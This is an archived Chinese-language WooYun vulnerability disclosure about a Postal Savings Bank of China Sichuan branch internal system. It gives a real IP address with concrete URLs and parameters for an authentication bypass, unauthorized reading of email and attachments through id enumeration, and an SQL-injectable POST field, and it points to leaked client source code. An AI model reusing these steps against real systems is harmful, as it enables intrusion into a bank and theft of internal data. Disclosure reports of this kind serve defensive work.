当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153818

漏洞标题:中国邮储银行某内部系统多个漏洞(可直接获取内部敏感文件)

相关厂商:中国邮政储蓄银行

漏洞作者: 路人甲

提交时间:2015-11-17 09:15

修复时间:2015-11-25 09:00

公开时间:2015-11-25 09:00

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-17: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国邮政储蓄银行某分行系统多个逻辑问题(可直接获取内部敏感文件),可获取到IOS客户端源代码

详细说明:

中国邮政储蓄银行四川省分行综合信息管理系统
http://118.112.186.175:2222/
#1 系统可任意注册(未校验内部邮箱等信息,只有审核机制)
注册一个账号为:测试,随意填入身份证号码和手机号码
提交后等待管理员审核,实际不需要审核就可以绕过登录认证进入系统
首先进行一次登录操作(密码为身份证后6位)
提示账号未审核
直接访问链接(自己输入,页面里没有)http://118.112.186.175:2222/super/index.php?c=welcome&m=index
成功进入系统
#2越权读取邮件(邮件中包含大量敏感的附件)

http://118.112.186.175:2222/super/index.php?c=mail_show&m=show_email&id=44581


修改id,试验1-44581都行,以下为证明:

屏幕快照 2015-11-13 上午7.09.57.png


屏幕快照 2015-11-13 上午7.10.22.png


屏幕快照 2015-11-13 上午7.11.00.png


屏幕快照 2015-11-13 上午7.11.17.png


#3 越权下载任意附件

http://118.112.186.175:2222/super/index.php?c=mail_show&m=download_attachments&attachments_id=3215


直接遍历attachments_id即可,不做过多证明。
#4注入,MYSQL数据库

http://118.112.186.175:2222/super/index.php?c=my_equipment&m=index
POST brand=&models=&category_name=&equipment_status=&equipment_id=1


equipment_id存在注入

SELECT * FROM (`equipment`) WHERE `bank_id` IN ('51000012', '510000122', '51000024', '51000036', '51000048', '51000051', '51000063', '51000075', '51000087', '51000099', '51000101', '51000113', '51000125', '51000137', '51000149', '51000152', '51000164', '51000176', '51000188', '51000190', '51000202', '51000214', '51000226', '51000238', '51000240', '51000253', '51000265', '51000277', '51000289', '51000303', '51000315', '51000327', '51000339', '51000341', '51000354', '51000380', '51000404', '51000430', '51000455', '51000467', '51000493', '51000517', '51000529', '51000531', '51000556', '51000582', '51000606', '51000618', '51000620', '51000695', '51000707', '51000721', '51000745', '51000784', '51000796', '51000810', '51000846', '51000885', '51000897', '51000935', '51000947', '51000950', '51000962', '51000986', '51001065', '51001077', '51001115', '51001178', '51001279', '51001281', '51001317', '51001356', '51001394', '51001406', '51001418', '51001420', '51001469', '51001519', '51001610', '51001750', '51001812', '51001964', '51002004', '51002283', '51002396', '51002410', '51002434', '51002446', '51002459', '51002473', '51002485', '51002497', '51002509', '51002511', '51002550', '51002687', '51002788', '51002954', '51003071', '51003083', '51003133', '51003285', '51003297', '51003309', '51003311', '51003335', '51003398', '51003400', '51003424', '51003448', '51003487', '51003602', '51003640', '51003703', '51003931', '51003968', '51003970', '51003982', '51004022', '51004059', '51004073', '51004109', '51004123', '51004287', '51004313', '51004325', '51004402', '51004414', '51004426', '51004438', '51004440', '51004453', '51004679', '51004705', '51004768', '51004794', '51004806', '51004818', '51004820', '51004844', '51005138', '51005468', '51005518', '51005607', '51005684', '51005710', '51006421', '51006445', '51006458', '51006510', '51006534', '51006559', '51006561', '51006609',


#5 邮储银行某手机客户端源代码直接泄露在github,可直接用Xcode编辑代码、重建工程(完整代码)
https://github.com/DevenZhao/ManageSystem/tree/5271f2bc2223c822aa0e4acd3a2c3a9200921cc8/%E4%B8%AD%E5%9B%BD%E9%82%AE%E6%94%BF%E5%82%A8%E8%93%84%E9%93%B6%E8%A1%8C%E5%86%85%E6%B5%8B%E7%89%88
以下是证明

屏幕快照 2015-11-13 上午7.34.00.png


源代码中各种接口

屏幕快照 2015-11-13 上午7.36.34.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无